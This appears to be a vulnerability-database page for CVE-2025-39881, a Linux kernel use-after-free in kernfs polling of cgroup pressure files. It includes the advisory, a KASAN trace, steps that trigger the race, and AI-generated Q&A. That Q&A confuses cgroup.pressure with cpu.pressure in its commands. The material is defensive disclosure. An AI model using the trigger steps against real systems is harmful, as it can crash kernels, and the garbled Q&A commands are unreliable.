CVE-2025-39881
Unknown Unknown - Not Provided
BaseFortify

Publication date: 2025-09-23

Last updated on: 2025-11-03

Assigner: kernel.org

Description
In the Linux kernel, the following vulnerability has been resolved: kernfs: Fix UAF in polling when open file is released A use-after-free (UAF) vulnerability was identified in the PSI (Pressure Stall Information) monitoring mechanism: BUG: KASAN: slab-use-after-free in psi_trigger_poll+0x3c/0x140 Read of size 8 at addr ffff3de3d50bd308 by task systemd/1 psi_trigger_poll+0x3c/0x140 cgroup_pressure_poll+0x70/0xa0 cgroup_file_poll+0x8c/0x100 kernfs_fop_poll+0x11c/0x1c0 ep_item_poll.isra.0+0x188/0x2c0 Allocated by task 1: cgroup_file_open+0x88/0x388 kernfs_fop_open+0x73c/0xaf0 do_dentry_open+0x5fc/0x1200 vfs_open+0xa0/0x3f0 do_open+0x7e8/0xd08 path_openat+0x2fc/0x6b0 do_filp_open+0x174/0x368 Freed by task 8462: cgroup_file_release+0x130/0x1f8 kernfs_drain_open_files+0x17c/0x440 kernfs_drain+0x2dc/0x360 kernfs_show+0x1b8/0x288 cgroup_file_show+0x150/0x268 cgroup_pressure_write+0x1dc/0x340 cgroup_file_write+0x274/0x548 Reproduction Steps: 1. Open test/cpu.pressure and establish epoll monitoring 2. Disable monitoring: echo 0 > test/cgroup.pressure 3. Re-enable monitoring: echo 1 > test/cgroup.pressure The race condition occurs because: 1. When cgroup.pressure is disabled (echo 0 > cgroup.pressure), it: - Releases PSI triggers via cgroup_file_release() - Frees of->priv through kernfs_drain_open_files() 2. While epoll still holds reference to the file and continues polling 3. Re-enabling (echo 1 > cgroup.pressure) accesses freed of->priv epolling disable/enable cgroup.pressure fd=open(cpu.pressure) while(1) ... epoll_wait kernfs_fop_poll kernfs_get_active = true echo 0 > cgroup.pressure ... cgroup_file_show kernfs_show // inactive kn kernfs_drain_open_files cft->release(of); kfree(ctx); ... kernfs_get_active = false echo 1 > cgroup.pressure kernfs_show kernfs_activate_one(kn); kernfs_fop_poll kernfs_get_active = true cgroup_file_poll psi_trigger_poll // UAF ... end: close(fd) To address this issue, introduce kernfs_get_active_of() for kernfs open files to obtain active references. This function will fail if the open file has been released. Replace kernfs_get_active() with kernfs_get_active_of() to prevent further operations on released file descriptors.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2025-09-23
Last Modified
2025-11-03
Generated
2026-05-06
AI Q&A
2025-09-23
EPSS Evaluated
2026-05-05
NVD
CVE-2025-39881
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
linux linux_kernel 6.1.153-1
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-UNKNOWN
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability is a use-after-free (UAF) bug in the Linux kernel's PSI (Pressure Stall Information) monitoring mechanism. It occurs when the cgroup.pressure file is disabled and then re-enabled while epoll is still polling the file. Disabling releases and frees certain kernel objects, but epoll continues to access these freed objects, leading to a UAF condition. This can cause the kernel to read invalid memory, potentially leading to crashes or other unpredictable behavior. The fix involves ensuring that operations do not continue on released file descriptors by introducing a function to check active references before proceeding.


How can this vulnerability impact me? :

This vulnerability can impact you by causing kernel instability or crashes due to the use-after-free condition. If exploited, it could potentially allow an attacker to execute arbitrary code in kernel space or cause denial of service by crashing the system. The issue arises during specific operations involving pressure stall information monitoring and cgroup pressure files, which could affect systems relying on these kernel features.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring the use of epoll on the cgroup pressure stall information files, specifically by observing the behavior when disabling and re-enabling cgroup.pressure. Commands to reproduce and detect the issue include: 1) Open the cpu.pressure file and establish epoll monitoring (e.g., using epoll_wait on the file descriptor). 2) Disable monitoring with: echo 0 > /sys/fs/cgroup/pressure/cpu.pressure 3) Re-enable monitoring with: echo 1 > /sys/fs/cgroup/pressure/cpu.pressure 4) Observe for kernel warnings or KASAN slab-use-after-free errors related to psi_trigger_poll. These steps help identify the use-after-free condition triggered by race conditions in polling.


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation involves avoiding the race condition by not disabling and re-enabling cgroup.pressure monitoring while epoll is actively polling the file. Additionally, updating the Linux kernel to a version that includes the fixβ€”where kernfs_get_active_of() replaces kernfs_get_active() to prevent operations on released file descriptorsβ€”is recommended to fully address the vulnerability.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart